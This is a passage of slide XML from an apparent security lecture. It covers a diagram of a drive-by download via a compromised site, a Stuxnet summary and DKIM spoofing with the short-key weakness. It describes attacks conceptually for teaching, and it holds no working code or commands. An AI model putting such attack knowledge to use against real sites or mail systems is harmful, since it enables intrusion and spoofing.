            <a:off x="5410200" y="1905000"/>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Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Joe hacks foobar.com and posts malicious stuff (eg. &lt;script&gt; tags pointing to malicious JavaScript)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="3276600"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="3886200"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30733" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="54102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b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poor old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" b="1">
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Curved Left Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13558277">
            <a:off x="2405857" y="2442368"/>
            <a:ext cx="514350" cy="22463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0735" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="30480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Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice visits foobar.com as usual</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Curved Left Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2893227">
            <a:off x="2951957" y="3375933"/>
            <a:ext cx="585613" cy="2215783"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>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0739" name="TextBox 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4800600"/>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Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice is served her regular pages along with the malicious stuff which go and install on her computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" b="1">
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Oval 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="4343400"/>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r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30741" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="5029200"/>
            <a:ext cx="3581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a:solidFill>
                  <a:srgbClr val="6A5650"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note: Step 3 may install malware  fully automatically (often called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6A5650"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6A5650"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>drive-by-download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6A5650"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="6A5650"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ) or it may require some inputs from Alice (like clicking on buttons or links)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="6A5650"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30742" name="Picture 9" descr="C:\Documents and Settings\Arun Viswanathan\Local Settings\Temporary Internet Files\Content.IE5\3HL6THFJ\MMj03365540000[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590800"/>
            <a:ext cx="7143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3" name="Picture 9" descr="C:\Documents and Settings\Arun Viswanathan\Local Settings\Temporary Internet Files\Content.IE5\3HL6THFJ\MMj03365540000[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343400"/>
            <a:ext cx="7143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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Recent Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="Footer Placeholder 4"/>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78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235BCD-8048-4681-AA32-50D6D078E15C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"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ltLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14131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88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9C5731B-B4AF-4B83-B005-808E248EFB1C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78852" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A highly Sophisticated computer worm. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Discovered in 2010, initially spread with Microsoft Windows. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Targets Siemens industrial software and equipment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>First discovered malware that spies and subverts industrial systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>First to include Programmable Logic Controller (PLC) rootkit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Different variants of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> targeted five Iranian Organizations, with the intended target to be the uranium enrichment infrastructure in Iran (I.e. Iran</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s nuclear program).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Symantec noted that 60% of the infected computers worldwide were located in Iran.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> destroyed up to 1,000 centrifuges (10% of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Natanz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> nuclear facility centrifuges) by having them change the rotor speed with the intention of introduction vibrations would destroy the centrifuges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>It is also speculated that the United States and/or Israel were behind such cyber attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The documentary movie “Zero Days” details the story of the worm and related actors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/Stuxnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.imdb.com/title/tt5446858/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78853"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669925"/>
            <a:ext cx="15938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457200" y="76200"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>E-mail Hacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1300">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141316"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798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537C5F6-E115-4755-AE4C-131FF6ADD3C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="787400"/>
            <a:ext cx="8229600" cy="5384800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Domain Keys Identified Mail (DKIM) Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>DKIM is a method of associating a domain name to an e-mail message, thereby allowing a person or organization to claim responsibility for a message. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Association is set up by digital signature validated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>recipient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>. Responsibility is claimed by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>signer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> by adding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>DKIM-signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>header. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>verifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> obtains signer</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s public key using DNS, and verifies the signature matches the message content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>DKIM is implemented by Yahoo, Gmail and AOL email providers. Any e-mail from these providers should carry the DKIM signature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>DKIM  can be used as anti-phishing technology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Gmail utilizes DKIM so that any e-mail from eBay (ebay.com) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Paypal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (paypal.com) will not be accepted if it cannot be verified with DKIM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In October 2012, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Wired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> reported that mathematician Zach Harris detected and demonstrated an e-mail source vulnerability with short DKIM keys.  Authentication with 384 bit keys could be factored in 24 hours </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on [his] laptop,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> and 512-bit keys could be factored in 72 hours with cloud computing resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Google confirmed beginning to use longer keys after this disclosure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
